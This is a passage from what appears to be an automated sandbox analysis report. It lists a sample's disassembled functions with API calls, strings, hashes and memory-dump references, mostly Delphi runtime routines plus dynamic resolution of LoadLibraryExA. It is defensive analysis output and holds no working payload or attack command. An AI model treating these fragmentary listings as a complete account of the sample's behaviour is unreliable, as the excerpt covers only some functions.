                                                                                                                            • Instruction Fuzzy Hash: 133188B1E4011C2AFF25E6B4DC45FDF77AD5B44380F8A41E19608E61C1D7749E888F51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02987F90 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02987FB1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1705453755-0
                                                                                                                            • Opcode ID: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
                                                                                                                            • Instruction ID: 7206e6ca4a6bfe504c69779583c0c02e69fa9271a6b0eb523bdfc79133cd6b6e
                                                                                                                            • Opcode Fuzzy Hash: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
                                                                                                                            • Instruction Fuzzy Hash: BC11DEB5E00209AFDB04DF99C981DEFF7F9FFC8300B54C569A519EB254E6719A018BA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298A780 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A79E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                            • Instruction ID: cdfa407f403a5af3eef842b887c7354e0a8b7871727d99710dada8dfcd333552
                                                                                                                            • Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                            • Instruction Fuzzy Hash: 68E0D872B0021817D710B5689C809FA739DAB9C710F08457FBD08C7341EEA09D404AE4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298B748 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(?,029AA106,00000000,029AA11E), ref: 0298B756
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Version
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1889659487-0
                                                                                                                            • Opcode ID: 376daf8f3a9830a21ce095000c8e89996491c74e6f1c194c4dc248003d6fb888
                                                                                                                            • Instruction ID: 4fda89da9c5d19d5c809717b47734b435489cecd0d95f0248f8289f3b9dedc97
                                                                                                                            • Opcode Fuzzy Hash: 376daf8f3a9830a21ce095000c8e89996491c74e6f1c194c4dc248003d6fb888
                                                                                                                            • Instruction Fuzzy Hash: 0FF0B7749483019FC350EF28D46072577E5FF99718F084D2DE498C7B80E77898148F92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298A7CC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0298BE2E,00000000,0298C047,?,?,00000000,00000000), ref: 0298A7DF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                            • Instruction ID: 1d293169e723749181476edf004ea673e0352bc4865aa653a86640b44f591fcf
                                                                                                                            • Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                            • Instruction Fuzzy Hash: 47D05E6630E2A03AA220A15A2D84DBB5AECCBC57A1F08443EF948CA201E200CC06A6B1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029891C8 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LocalTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 481472006-0
                                                                                                                            • Opcode ID: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                            • Instruction ID: edf09770ef5b87482194831e3c07699c2da6464e978caf543d42d0589570a63a
                                                                                                                            • Opcode Fuzzy Hash: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                            • Instruction Fuzzy Hash: 03A011008088200282803B280C0223A3088A880A20FC80B88A8F8882E0EA2E022880E3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298D250 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0298D259
                                                                                                                              • Part of subcall function 0298D224: GetProcAddress.KERNEL32(00000000), ref: 0298D23D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                            • Opcode ID: b8045882b8bdfef0b96cdc03314bed4551e8eac915daf86c68c9fd65fb7a38d0
                                                                                                                            • Instruction ID: 935a30438f4d02f32659812b580f87a1a1a6217c3900c3c17aebe5daf86308e4
                                                                                                                            • Opcode Fuzzy Hash: b8045882b8bdfef0b96cdc03314bed4551e8eac915daf86c68c9fd65fb7a38d0
                                                                                                                            • Instruction Fuzzy Hash: A7417872A493449B96187B7E780043BB7DAEA9675036C641BB418DF7C4DE30EC528E3A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02996E94 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02996E9A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02996EAB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02996EBB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02996ECB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02996EDB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02996EEB
                                                                                                                            • GetProcAddress.KERNEL32 ref: 02996EFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                            • API String ID: 667068680-2233174745
                                                                                                                            • Opcode ID: 3650b5f91f4c14e92bf67bc389f1fc54c7627403cc8d1594e81a0a468a09023b
                                                                                                                            • Instruction ID: 991fd26444195f923ef8477cec9218b8d36b79973def3a12e546672bdcddfdf3
                                                                                                                            • Opcode Fuzzy Hash: 3650b5f91f4c14e92bf67bc389f1fc54c7627403cc8d1594e81a0a468a09023b
                                                                                                                            • Instruction Fuzzy Hash: 67F0ACB1ACE3946DBB007B785CAEA3A2B9D99E1658344183D64376D981EAB488104F60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02982530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029828CE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message
                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                            • API String ID: 2030045667-32948583
                                                                                                                            • Opcode ID: a177a69c1a533fc4aeca6e9e6db1bf0051e814d38ece04156de2046ea0276f54
                                                                                                                            • Instruction ID: 06a3f07bf955e65433c7aa2ce3fe585615dbb3198937a6215d69a80adbec0a3c
                                                                                                                            • Opcode Fuzzy Hash: a177a69c1a533fc4aeca6e9e6db1bf0051e814d38ece04156de2046ea0276f54
                                                                                                                            • Instruction Fuzzy Hash: 29A1D130E043E48BDF21BB2CCC84BA9B7E9EB49750F1840E5ED49AB285CB759985CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299A058 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 0299A078
                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0299A08F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 0299A095
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0299A123
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 0299A12F
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 0299A143
                                                                                                                            Strings
                                                                                                                            • LoadLibraryExA, xrefs: 0299A085
                                                                                                                            • C:\Windows\System32\KernelBase.dll, xrefs: 0299A08A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Read$AddressHandleModuleProc
                                                                                                                            • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                            • API String ID: 1061262613-1650066521
                                                                                                                            • Opcode ID: 9d6d9d5671ad2d03735b5f83d2874df2d2f65473a8dd8e420ee96f747f30b939
                                                                                                                            • Instruction ID: fb5e54c0f2f4f974b97ae05fa695f4557de0ed602251cf2d470546a47eba79eb
                                                                                                                            • Opcode Fuzzy Hash: 9d6d9d5671ad2d03735b5f83d2874df2d2f65473a8dd8e420ee96f747f30b939
                                                                                                                            • Instruction Fuzzy Hash: 03311CB1A41205BFDF20EF68CC85F6AB7ACEF45768F044554EA14AB281D774A9508F60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • bytes: , xrefs: 0298275D
                                                                                                                            • An unexpected memory leak has occurred. , xrefs: 02982690
                                                                                                                            • , xrefs: 02982814
                                                                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02982849
                                                                                                                            • 7, xrefs: 029826A1
                                                                                                                            • The unexpected small block leaks are:, xrefs: 02982707
                                                                                                                            • Unexpected Memory Leak, xrefs: 029828C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                            • API String ID: 0-2723507874
                                                                                                                            • Opcode ID: 19b1222eb70c76fa339346bbb23c96d12513bef5b3f52b78fd6ef6b679056192
                                                                                                                            • Instruction ID: 2f9aea6da0e1ba06d9544077cf56c9bc61c163a380f35e007a1257e63f4087e4
                                                                                                                            • Opcode Fuzzy Hash: 19b1222eb70c76fa339346bbb23c96d12513bef5b3f52b78fd6ef6b679056192
                                                                                                                            • Instruction Fuzzy Hash: 1A71C230E042D88FDF21BB2CCC84BA9BAE9EB49744F1840E5D949DB281DB758AC5CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298BD7C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetThreadLocale.KERNEL32(00000000,0298C047,?,?,00000000,00000000), ref: 0298BDB2
                                                                                                                              • Part of subcall function 0298A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A79E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                            • API String ID: 4232894706-2493093252
                                                                                                                            • Opcode ID: 10ff2a8bb53d927a9fa01bf878789205071348e4d9f2387e9c051627016e46a4
                                                                                                                            • Instruction ID: 552433d4696bba51a80b9c23e7b24d225c278d6b1e589863ac93f8f3fccf5cea
                                                                                                                            • Opcode Fuzzy Hash: 10ff2a8bb53d927a9fa01bf878789205071348e4d9f2387e9c051627016e46a4
                                                                                                                            • Instruction Fuzzy Hash: 12613F34B002499BDB04FBB4D850AAFB7FBDFC8300F5C9476E111AB245DA39D9069BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02984320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843E7,?,?,029E37C8,?,?,029AB7A8,02986575,029AA305), ref: 02984359
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843E7,?,?,029E37C8,?,?,029AB7A8,02986575,029AA305), ref: 0298435F
                                                                                                                            • GetStdHandle.KERNEL32(000000F5,029843A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843E7,?,?,029E37C8), ref: 02984374
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,029843A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843E7,?,?), ref: 0298437A
                                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02984398
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                                            • Opcode ID: a4d8d0a76e6ee3bb9e75cdaa707408f724745eb8b36f17df7b3d64c32635965d
                                                                                                                            • Instruction ID: 4179376cd81e9cac38bf43843ecdd32b07f9a698cb0216a7e8a0ec081a18fee7
                                                                                                                            • Opcode Fuzzy Hash: a4d8d0a76e6ee3bb9e75cdaa707408f724745eb8b36f17df7b3d64c32635965d
                                                                                                                            • Instruction Fuzzy Hash: CDF09070AC8345B9FF10B2A0AD56F79274C5BD5F29F580B06B229E90C587F044C18B66
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298AE80 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0298ACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298AD15
                                                                                                                              • Part of subcall function 0298ACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD39
                                                                                                                              • Part of subcall function 0298ACF8: GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD54
                                                                                                                              • Part of subcall function 0298ACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADEA
                                                                                                                            • CharToOemA.USER32(?,?), ref: 0298AEB7
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0298AED4
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEDA
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,0298AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEEF
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,0298AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEF5
                                                                                                                            • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0298AF17
                                                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0298AF2D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 185507032-0
                                                                                                                            • Opcode ID: a6758e80fd616c65d33339d947402a69c5e44c033973dde6bdc5b9987071ca53
                                                                                                                            • Instruction ID: 531e071b457a42c5a13524e32aca704ee1357c891a07d06f162d5dea37e4c5f1
                                                                                                                            • Opcode Fuzzy Hash: a6758e80fd616c65d33339d947402a69c5e44c033973dde6bdc5b9987071ca53
                                                                                                                            • Instruction Fuzzy Hash: 1A112EB6548344BED600FBA4DC81F9B77EDAB85700F88092AB754DE0E0DA70E9448B66
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298E548 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0298E5E1
                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0298E5FD
                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0298E636
                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0298E6B3
                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0298E6CC
                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 0298E701
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 351091851-0
                                                                                                                            • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                            • Instruction ID: f49bdbf78b8941ac8b897187d9e6b31a659ffccfd6ba6dd65881ac46d1dfb9f7
                                                                                                                            • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                            • Instruction Fuzzy Hash: 0351D6B59006299BCB22EB68C890BD9B3BDAF8D300F0841E5F549E7251D770EF858F65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0298357E
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029835CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835B1
                                                                                                                            • RegCloseKey.ADVAPI32(?,029835D4,00000000,?,00000004,00000000,029835CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                            • API String ID: 3677997916-4173385793
                                                                                                                            • Opcode ID: 17c8e5e5a09d111b329e0876fa1e7ec634cde681528e24f23bd0ffcc4d662e4c
                                                                                                                            • Instruction ID: bc43a45495181eea42d3b7a7043fce7da781400fc2925ee4a23fda38428a91b0
                                                                                                                            • Opcode Fuzzy Hash: 17c8e5e5a09d111b329e0876fa1e7ec634cde681528e24f23bd0ffcc4d662e4c
                                                                                                                            • Instruction Fuzzy Hash: 3D01D875A54318BAFB11EB90CC02FBDB3ECEB48B10F1005A5BB04D65C0E6749610CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298AA0C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0298AAA3,?,?,00000000), ref: 0298AA24
                                                                                                                              • Part of subcall function 0298A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A79E
